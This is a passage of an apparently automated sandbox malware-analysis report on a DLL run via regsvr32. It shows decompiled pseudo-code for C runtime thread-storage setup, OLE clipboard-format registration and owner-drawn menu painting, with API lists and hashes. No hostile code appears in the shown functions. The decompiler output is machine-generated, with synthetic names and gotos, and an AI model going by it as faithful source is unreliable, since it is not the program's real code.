							 *0x100be430 = E10051420( *0x100be430);
							 *0x100be434 = E10051420( *0x100be434);
							_t18 = E1004EB97();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10051556();
								goto L15;
							} else {
								_push(E100516E2);
								_t21 =  *((intOrPtr*)(E1005148C( *0x100be428)))();
								__eflags = _t21 - 0xffffffff;
								 *0x100ba24c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1005496F(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x100ba24c);
										__eflags =  *((intOrPtr*)(E1005148C( *0x100be430)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10051593(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10051556();
					return 0;
				}
			}
















                                                                                                                0x10051878
                                                                                                                0x10051884
                                                                                                                0x10051888
                                                                                                                0x100518a8
                                                                                                                0x100518b5
                                                                                                                0x100518c2
                                                                                                                0x100518c7
                                                                                                                0x100518c9
                                                                                                                0x100518d0
                                                                                                                0x100518d6
                                                                                                                0x100518db
                                                                                                                0x100518f3
                                                                                                                0x100518f8
                                                                                                                0x10051902
                                                                                                                0x1005190c
                                                                                                                0x10051912
                                                                                                                0x100518dd
                                                                                                                0x100518dd
                                                                                                                0x100518e4
                                                                                                                0x00000000
                                                                                                                0x100518e6
                                                                                                                0x100518e6
                                                                                                                0x100518ed
                                                                                                                0x00000000
                                                                                                                0x100518ef
                                                                                                                0x100518ef
                                                                                                                0x100518f1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100518f1
                                                                                                                0x100518ed
                                                                                                                0x100518e4
                                                                                                                0x10051917
                                                                                                                0x1005191d
                                                                                                                0x10051920
                                                                                                                0x10051925
                                                                                                                0x100519f7
                                                                                                                0x100519f7
                                                                                                                0x100519f7
                                                                                                                0x1005192b
                                                                                                                0x10051932
                                                                                                                0x10051934
                                                                                                                0x10051936
                                                                                                                0x00000000
                                                                                                                0x1005193c
                                                                                                                0x1005193c
                                                                                                                0x10051952
                                                                                                                0x10051962
                                                                                                                0x10051972
                                                                                                                0x1005197f
                                                                                                                0x10051984
                                                                                                                0x10051989
                                                                                                                0x1005198b
                                                                                                                0x100519f2
                                                                                                                0x100519f2
                                                                                                                0x00000000
                                                                                                                0x1005198d
                                                                                                                0x1005198d
                                                                                                                0x1005199e
                                                                                                                0x100519a0
                                                                                                                0x100519a3
                                                                                                                0x100519a8
                                                                                                                0x00000000
                                                                                                                0x100519aa
                                                                                                                0x100519b6
                                                                                                                0x100519b8
                                                                                                                0x100519bc
                                                                                                                0x00000000
                                                                                                                0x100519be
                                                                                                                0x100519be
                                                                                                                0x100519bf
                                                                                                                0x100519d3
                                                                                                                0x100519d5
                                                                                                                0x00000000
                                                                                                                0x100519d7
                                                                                                                0x100519d7
                                                                                                                0x100519d9
                                                                                                                0x100519da
                                                                                                                0x100519e1
                                                                                                                0x100519e7
                                                                                                                0x100519eb
                                                                                                                0x100519ef
                                                                                                                0x100519ef
                                                                                                                0x100519d5
                                                                                                                0x100519bc
                                                                                                                0x100519a8
                                                                                                                0x1005198b
                                                                                                                0x10051936
                                                                                                                0x100519fb
                                                                                                                0x1005188a
                                                                                                                0x1005188a
                                                                                                                0x10051892
                                                                                                                0x10051892

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10048C1A,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 1005187E
                                                                                                                • __mtterm.LIBCMT ref: 1005188A
                                                                                                                  • Part of subcall function 10051556: __decode_pointer.LIBCMT ref: 10051567
                                                                                                                  • Part of subcall function 10051556: TlsFree.KERNEL32(00000021,10048CB6,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051581
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518A0
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518AD
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518BA
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518C7
                                                                                                                • TlsAlloc.KERNEL32(?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051917
                                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051932
                                                                                                                • __init_pointers.LIBCMT ref: 1005193C
                                                                                                                • __encode_pointer.LIBCMT ref: 10051947
                                                                                                                • __encode_pointer.LIBCMT ref: 10051957
                                                                                                                • __encode_pointer.LIBCMT ref: 10051967
                                                                                                                • __encode_pointer.LIBCMT ref: 10051977
                                                                                                                • __decode_pointer.LIBCMT ref: 10051998
                                                                                                                • __calloc_crt.LIBCMT ref: 100519B1
                                                                                                                • __decode_pointer.LIBCMT ref: 100519CB
                                                                                                                • __initptd.LIBCMT ref: 100519DA
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 100519E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                • API String ID: 2657569430-3819984048
                                                                                                                • Opcode ID: a20bf7fe6d10bbdb3b48a3c10ac7808f7183ddfaa0b16d44cce35714afc1420d
                                                                                                                • Instruction ID: 0b706c3264f501d65f347b28e59f904ffa28db24f5d0894a088f402869511bed
                                                                                                                • Opcode Fuzzy Hash: a20bf7fe6d10bbdb3b48a3c10ac7808f7183ddfaa0b16d44cce35714afc1420d
                                                                                                                • Instruction Fuzzy Hash: E631A23D8112A1AAF711EF748C85ADA3BE4EB493A0B104B26FA11C31B1DB34EC85CF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003BA9C Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003BA9C(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                                0x1003baa9
                                                                                                                0x1003bab2
                                                                                                                0x1003babb
                                                                                                                0x1003bac5
                                                                                                                0x1003bacf
                                                                                                                0x1003bad9
                                                                                                                0x1003bae3
                                                                                                                0x1003baed
                                                                                                                0x1003baf7
                                                                                                                0x1003bb01
                                                                                                                0x1003bb0b
                                                                                                                0x1003bb15
                                                                                                                0x1003bb1a
                                                                                                                0x1003bb21

                                                                                                                APIs
                                                                                                                • RegisterClipboardFormatA.USER32(Native), ref: 1003BAAB
                                                                                                                • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1003BAB4
                                                                                                                • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1003BABE
                                                                                                                • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1003BAC8
                                                                                                                • RegisterClipboardFormatA.USER32(Embed Source), ref: 1003BAD2
                                                                                                                • RegisterClipboardFormatA.USER32(Link Source), ref: 1003BADC
                                                                                                                • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1003BAE6
                                                                                                                • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1003BAF0
                                                                                                                • RegisterClipboardFormatA.USER32(FileName), ref: 1003BAFA
                                                                                                                • RegisterClipboardFormatA.USER32(FileNameW), ref: 1003BB04
                                                                                                                • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1003BB0E
                                                                                                                • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1003BB18
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
                                                                                                                • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                • API String ID: 1228543026-2889995556
                                                                                                                • Opcode ID: b863bfad9a6418f9e2fd1412faae52298b95b30eeefb4627becfeae85f7cd8de
                                                                                                                • Instruction ID: d6250aa12c54189e2aaf52096f9617c6b42460172e35f872c6075af019b10c62
                                                                                                                • Opcode Fuzzy Hash: b863bfad9a6418f9e2fd1412faae52298b95b30eeefb4627becfeae85f7cd8de
                                                                                                                • Instruction Fuzzy Hash: 100135718007D4AACB30EF769D1888BBAE4EED53103524D3BF29997650E7749C41DF84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001E751 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 397windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1001E751(void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				int _t177;
				intOrPtr _t183;
				int _t185;
				long _t193;
				intOrPtr* _t212;
				RECT* _t214;
				signed char _t218;
				signed int _t229;
				intOrPtr _t237;
				long _t256;
				long _t257;
				long _t299;
				long _t305;
				CHAR* _t313;
				signed char _t315;
				char _t318;
				intOrPtr _t329;
				signed int _t340;
				int _t364;
				signed int _t366;
				CHAR* _t369;
				char _t370;
				struct tagMENUITEMINFOA _t373;
				intOrPtr* _t379;
				struct tagRECT* _t380;

				_t362 = __edx;
				_push(0x58);
				_t177 = E1004764D(0x1008f3b2, __ebx, __edi, __esi);
				_t366 = __ecx;
				 *(_t380 + 0x54) = __ecx;
				_t313 =  *(_t380 + 0x60);
				_t318 = _t313[0x2c];
				 *(_t380 + 0x3c) = _t318;
				if(_t318 == 0) {
					L27:
					 *[fs:0x0] =  *((intOrPtr*)(_t380 - 0xc));
					return _t177;
				}
				_t177 = E100203AA(_t318, 0x1009a248);
				if(_t177 == 0) {
					goto L27;
				}
				_t373 = 0x30;
				E10049170(__ecx, _t380 - 0x3c, 0, _t373);
				 *(_t380 - 0x3c) = _t373;
				 *((intOrPtr*)(_t380 - 0x38)) = 0x40;
				_t177 = GetMenuItemInfoA( *(_t366 + 4), _t313[8], 0, _t380 - 0x3c);
				if(_t177 == 0) {
					goto L27;
				}
				L1000140B(_t380 + 0x60, E100184C0());
				 *(_t380 - 4) =  *(_t380 - 4) & 0x00000000;
				_t183 = L100011F4(_t380 + 0x60,  *((intOrPtr*)(_t380 - 0x14)));
				 *((intOrPtr*)(_t380 - 0x14)) =  *((intOrPtr*)(_t380 - 0x14)) + 1;
				 *((intOrPtr*)(_t380 - 0x18)) = _t183;
				_t185 = GetMenuItemInfoA( *(_t366 + 4), _t313[8], 0, _t380 - 0x3c);
				E1000FED3(_t380 + 0x60, 0xffffffff);
				_t390 = _t185;
				if(_t185 == 0) {
					L26:
					_t177 = L100013E3( &(( *(_t380 + 0x60))[0xfffffffffffffff0]), _t362);
					goto L27;
				}
				CopyRect(_t380,  &(_t313[0x1c]));
				GetObjectA( *( *(_t380 + 0x3c) + 4), 0x18, _t380 - 0x64);
				_t193 = GetSysColor(4);
				_t328 = _t380->top;
				 *(_t380 + 0x40) = _t193;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) & 0x00000000;
				asm("cdq");
				asm("cdq");
				 *((intOrPtr*)(_t380 + 0x4c)) =  *((intOrPtr*)(_t380 - 0x60)) + 1;
				_t329 = (_t380->bottom - _t380->top - _t362 >> 1) - ( *((intOrPtr*)(_t380 - 0x5c)) - _t362 >> 1) + _t328 - 1;
				 *((intOrPtr*)(_t380 + 0x48)) = _t329;
				 *((intOrPtr*)(_t380 + 0x50)) =  *((intOrPtr*)(_t380 - 0x5c)) + 1 + _t329;
				_t379 = E1000CCCE(_t313, _t329, GetSysColor, (_t380->bottom - _t380->top - _t362 >> 1) - ( *((intOrPtr*)(_t380 - 0x5c)) - _t362 >> 1), _t390);
				 *((intOrPtr*)(_t380 + 0x20)) =  *((intOrPtr*)( *_t379 + 0x1c))(_t313[0x18]);
				 *((intOrPtr*)( *_t379 + 0x28))( *(_t380 + 0x54) + 8);
				_t212 = E1001E5E1(_t379, _t380 + 0x34, _t380 + 0x60);
				 *((intOrPtr*)(_t380 + 0x28)) =  *((intOrPtr*)(_t212 + 4));
				 *((intOrPtr*)(_t380 + 0x24)) =  *_t212;
				_t214 =  &(_t313[0x1c]);
				if((_t313[0x10] & 0x00000001) == 0) {
					E1001FBA9(_t379, _t214,  *(_t380 + 0x40));
					 *((intOrPtr*)( *_t379 + 0x2c))( *(_t380 + 0x40));
					_t218 = _t313[0x10];
					__eflags = _t218 & 0x00000002;
					if((_t218 & 0x00000002) == 0) {
						__eflags = _t218 & 0x00000008;
						if(__eflags != 0) {
							 *((intOrPtr*)(_t380 + 0x38)) =  *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48));
							 *(_t380 + 0x54) =  *((intOrPtr*)(_t380 + 0x4c)) -  *(_t380 + 0x44);
							_t256 = GetSysColor(0x14);
							_t257 = GetSysColor(0x10);
							__eflags =  *(_t380 + 0x54) + 1;
							E10020163(_t379, __eflags,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x48)),  *(_t380 + 0x54) + 1,  *((intOrPtr*)(_t380 + 0x38)) + 1, _t257, _t256);
						}
						 *((intOrPtr*)( *_t379 + 0x2c))( *(_t380 + 0x40));
						 *((intOrPtr*)(_t380 + 0x38)) =  *_t379;
						 *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x38)) + 0x30))(GetSysColor(7));
						L16:
						_t369 =  *(_t380 + 0x60);
						asm("cdq");
						_t340 =  *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48)) - _t362;
						asm("cdq");
						_push(0);
						_t229 =  *((intOrPtr*)(_t380 + 0x28)) - _t362;
						_t362 =  *((intOrPtr*)(_t369 - 0xc));
						_push( *((intOrPtr*)(_t369 - 0xc)));
						_push(_t369);
						_push(0);
						_push(2);
						_push((_t340 >> 1) - (_t229 >> 1) +  *((intOrPtr*)(_t380 + 0x48)));
						_push( *((intOrPtr*)(_t380 + 0x4c)) + 3);
						_push( *(_t379 + 4));
						L17:
						ExtTextOutA();
						 *(_t380 + 0x30) =  *(_t380 + 0x30) & 0x00000000;
						 *(_t380 + 0x2c) = 0x10098d24;
						_t315 = _t313[0x10];
						_t396 = _t315 & 0x00000002;
						 *(_t380 - 4) = 1;
						if((_t315 & 0x00000002) == 0) {
							__eflags = _t315 & 0x00000008;
							if(__eflags == 0) {
								_t370 =  *(_t380 + 0x3c);
							} else {
								_push(0xffffff);
								_push( *(_t380 + 0x40));
								_push(_t380 + 0x2c);
								_push( *(_t380 + 0x3c));
								E1000DAF6(_t315, _t369, _t379, __eflags);
								_t370 = _t380 + 0x2c;
							}
						} else {
							_push( *(_t380 + 0x40));
							_push(_t380 + 0x2c);
							_push( *(_t380 + 0x3c));
							E1000D64C(_t315, _t369, _t379, _t396);
							_t370 = _t380 + 0x2c;
						}
						E1000C4AC(_t380 + 0x10);
						 *(_t380 - 4) = 2;
						E1000CCDC(_t380 + 0x10, _t370, _t380, CreateCompatibleDC(0));
						if(_t370 != 0) {
							_t237 =  *((intOrPtr*)(_t370 + 4));
						} else {
							_t237 = 0;
						}
						E1000D0A1( *((intOrPtr*)(_t380 + 0x14)), _t237);
						InflateRect(_t380 + 0x44, 0xffffffff, 0xffffffff);
						E1000C436(_t379,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x48)),  *((intOrPtr*)(_t380 + 0x4c)),  *((intOrPtr*)(_t380 + 0x50)), _t380 + 0x10, 0, 0, 0xcc0020);
						 *((intOrPtr*)( *_t379 + 0x20))( *((intOrPtr*)(_t380 + 0x20)));
						 *(_t380 - 4) = 1;
						L1000CD56(_t380 + 0x10);
						 *(_t380 - 4) = 0;
						 *(_t380 + 0x2c) = 0x10098308;
						L1000CFF6(_t380 + 0x2c);
						goto L26;
					}
					 *((intOrPtr*)(_t380 + 0x38)) =  *_t379;
					 *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x38)) + 0x30))(GetSysColor(0x14));
					E1000BD32(_t379, 1);
					_t353 =  *((intOrPtr*)(_t380 + 0x48));
					asm("cdq");
					 *(_t380 + 0x54) =  *((intOrPtr*)(_t380 + 0x28)) - _t362;
					 *(_t380 + 0x54) =  *(_t380 + 0x54) >> 1;
					asm("cdq");
					_t364 =  *( *(_t380 + 0x60) - 0xc);
					_t99 = _t353 + 1; // 0x2
					ExtTextOutA( *(_t379 + 4),  *((intOrPtr*)(_t380 + 0x4c)) + 4, ( *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48)) - _t362 >> 1) -  *(_t380 + 0x54) + _t99, 2, 0,  *(_t380 + 0x60), _t364, 0);
					 *((intOrPtr*)(_t380 + 0x38)) =  *_t379;
					 *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x38)) + 0x30))(GetSysColor(0x11));
					_t369 =  *(_t380 + 0x60);
					asm("cdq");
					_push(0);
					_t362 =  *((intOrPtr*)(_t369 - 0xc));
					_push( *((intOrPtr*)(_t369 - 0xc)));
					_push(_t369);
					_push(0);
					_push(0);
					_push(( *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48)) - _t364 >> 1) -  *(_t380 + 0x54) +  *((intOrPtr*)(_t380 + 0x48)));
					_push( *((intOrPtr*)(_t380 + 0x4c)) + 3);
					_push( *(_t379 + 4));
					goto L17;
				}
				CopyRect(_t380 - 0x4c, _t214);
				 *(_t380 - 0x4c) =  *((intOrPtr*)(_t380 + 0x4c)) + 2;
				E1001FBA9(_t379, _t380 - 0x4c, GetSysColor(0xd));
				if((_t313[0x10] & 0x0000000a) == 0) {
					 *(_t380 + 0x54) =  *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48));
					 *((intOrPtr*)(_t380 + 0x38)) =  *((intOrPtr*)(_t380 + 0x4c)) -  *(_t380 + 0x44);
					_t305 = GetSysColor(0x10);
					E10020163(_t379,  *((intOrPtr*)(_t380 + 0x38)) + 1,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x48)),  *((intOrPtr*)(_t380 + 0x38)) + 1,  *(_t380 + 0x54) + 1, GetSysColor(0x14), _t305);
				}
				 *((intOrPtr*)(_t380 + 0x38)) =  *_t379;
				 *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x38)) + 0x2c))(GetSysColor(0xd));
				if((_t313[0x10] & 0x00000002) == 0) {
					_t299 = GetSysColor(0xe);
				} else {
					_t299 =  *(_t380 + 0x40);
				}
				_t362 =  *_t379;
				 *((intOrPtr*)(_t362 + 0x30))(_t299);
				goto L16;
			}





























                                                                                                                0x1001e751
                                                                                                                0x1001e755
                                                                                                                0x1001e75c
                                                                                                                0x1001e761
                                                                                                                0x1001e763
                                                                                                                0x1001e766
                                                                                                                0x1001e769
                                                                                                                0x1001e76e
                                                                                                                0x1001e771
                                                                                                                0x1001eb65
                                                                                                                0x1001eb68
                                                                                                                0x1001eb77
                                                                                                                0x1001eb77
                                                                                                                0x1001e77c
                                                                                                                0x1001e783
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001e78b
                                                                                                                0x1001e793
                                                                                                                0x1001e7a8
                                                                                                                0x1001e7b1
                                                                                                                0x1001e7b8
                                                                                                                0x1001e7bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001e7cb
                                                                                                                0x1001e7d3
                                                                                                                0x1001e7da
                                                                                                                0x1001e7df
                                                                                                                0x1001e7e6
                                                                                                                0x1001e7f2
                                                                                                                0x1001e7fb
                                                                                                                0x1001e800
                                                                                                                0x1001e802
                                                                                                                0x1001eb5a
                                                                                                                0x1001eb60
                                                                                                                0x00000000
                                                                                                                0x1001eb60
                                                                                                                0x1001e810
                                                                                                                0x1001e822
                                                                                                                0x1001e830
                                                                                                                0x1001e832
                                                                                                                0x1001e835
                                                                                                                0x1001e83b
                                                                                                                0x1001e841
                                                                                                                0x1001e84c
                                                                                                                0x1001e859
                                                                                                                0x1001e85f
                                                                                                                0x1001e866
                                                                                                                0x1001e869
                                                                                                                0x1001e871
                                                                                                                0x1001e880
                                                                                                                0x1001e888
                                                                                                                0x1001e895
                                                                                                                0x1001e8a3
                                                                                                                0x1001e8a6
                                                                                                                0x1001e8a9
                                                                                                                0x1001e8ac
                                                                                                                0x1001e943
                                                                                                                0x1001e94f
                                                                                                                0x1001e952
                                                                                                                0x1001e955
                                                                                                                0x1001e957
                                                                                                                0x1001e9fa
                                                                                                                0x1001e9fc
                                                                                                                0x1001ea06
                                                                                                                0x1001ea0f
                                                                                                                0x1001ea12
                                                                                                                0x1001ea17
                                                                                                                0x1001ea22
                                                                                                                0x1001ea2c
                                                                                                                0x1001ea2c
                                                                                                                0x1001ea38
                                                                                                                0x1001ea3f
                                                                                                                0x1001ea4a
                                                                                                                0x1001ea4d
                                                                                                                0x1001ea53
                                                                                                                0x1001ea56
                                                                                                                0x1001ea59
                                                                                                                0x1001ea5e
                                                                                                                0x1001ea5f
                                                                                                                0x1001ea61
                                                                                                                0x1001ea63
                                                                                                                0x1001ea66
                                                                                                                0x1001ea67
                                                                                                                0x1001ea6c
                                                                                                                0x1001ea76
                                                                                                                0x1001ea78
                                                                                                                0x1001ea7c
                                                                                                                0x1001ea7d
                                                                                                                0x1001ea80
                                                                                                                0x1001ea80
                                                                                                                0x1001ea86
                                                                                                                0x1001ea8a
                                                                                                                0x1001ea91
                                                                                                                0x1001ea94
                                                                                                                0x1001ea97
                                                                                                                0x1001ea9b
                                                                                                                0x1001eab1
                                                                                                                0x1001eab4
                                                                                                                0x1001ead1
                                                                                                                0x1001eab6
                                                                                                                0x1001eab6
                                                                                                                0x1001eabb
                                                                                                                0x1001eac1
                                                                                                                0x1001eac2
                                                                                                                0x1001eac5
                                                                                                                0x1001eacd
                                                                                                                0x1001eacd
                                                                                                                0x1001ea9d
                                                                                                                0x1001ea9d
                                                                                                                0x1001eaa3
                                                                                                                0x1001eaa4
                                                                                                                0x1001eaa7
                                                                                                                0x1001eaac
                                                                                                                0x1001eaac
                                                                                                                0x1001ead7
                                                                                                                0x1001eadf
                                                                                                                0x1001eaed
                                                                                                                0x1001eaf4
                                                                                                                0x1001eafa
                                                                                                                0x1001eaf6
                                                                                                                0x1001eaf6
                                                                                                                0x1001eaf6
                                                                                                                0x1001eb01
                                                                                                                0x1001eb0e
                                                                                                                0x1001eb2d
                                                                                                                0x1001eb39
                                                                                                                0x1001eb3f
                                                                                                                0x1001eb43
                                                                                                                0x1001eb4b
                                                                                                                0x1001eb4e
                                                                                                                0x1001eb55
                                                                                                                0x00000000
                                                                                                                0x1001eb55
                                                                                                                0x1001e961
                                                                                                                0x1001e96c
                                                                                                                0x1001e973
                                                                                                                0x1001e97b
                                                                                                                0x1001e97e
                                                                                                                0x1001e981
                                                                                                                0x1001e987
                                                                                                                0x1001e98c
                                                                                                                0x1001e992
                                                                                                                0x1001e9a2
                                                                                                                0x1001e9b3
                                                                                                                0x1001e9bd
                                                                                                                0x1001e9c8
                                                                                                                0x1001e9d1
                                                                                                                0x1001e9d7
                                                                                                                0x1001e9d8
                                                                                                                0x1001e9dc
                                                                                                                0x1001e9df
                                                                                                                0x1001e9e5
                                                                                                                0x1001e9e9
                                                                                                                0x1001e9eb
                                                                                                                0x1001e9ed
                                                                                                                0x1001e9f1
                                                                                                                0x1001e9f2
                                                                                                                0x00000000
                                                                                                                0x1001e9f2
                                                                                                                0x1001e8b7
                                                                                                                0x1001e8c5
                                                                                                                0x1001e8d1
                                                                                                                0x1001e8da
                                                                                                                0x1001e8e4
                                                                                                                0x1001e8ed
                                                                                                                0x1001e8f0
                                                                                                                0x1001e90a
                                                                                                                0x1001e90a
                                                                                                                0x1001e913
                                                                                                                0x1001e91e
                                                                                                                0x1001e925
                                                                                                                0x1001e92e
                                                                                                                0x1001e927
                                                                                                                0x1001e927
                                                                                                                0x1001e927
                                                                                                                0x1001e930
                                                                                                                0x1001e935
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001E75C
                                                                                                                • _memset.LIBCMT ref: 1001E793
                                                                                                                • GetMenuItemInfoA.USER32 ref: 1001E7B8
                                                                                                                • GetMenuItemInfoA.USER32 ref: 1001E7F2
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                • CopyRect.USER32(?,?), ref: 1001E810
                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 1001E822
                                                                                                                • GetSysColor.USER32 ref: 1001E830
                                                                                                                  • Part of subcall function 1001E5E1: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 1001E5F6
                                                                                                                • CopyRect.USER32(?,?), ref: 1001E8B7
                                                                                                                • GetSysColor.USER32 ref: 1001E8F0
                                                                                                                • GetSysColor.USER32 ref: 1001E8F5
                                                                                                                • GetSysColor.USER32 ref: 1001E916
                                                                                                                • GetSysColor.USER32 ref: 1001E92E
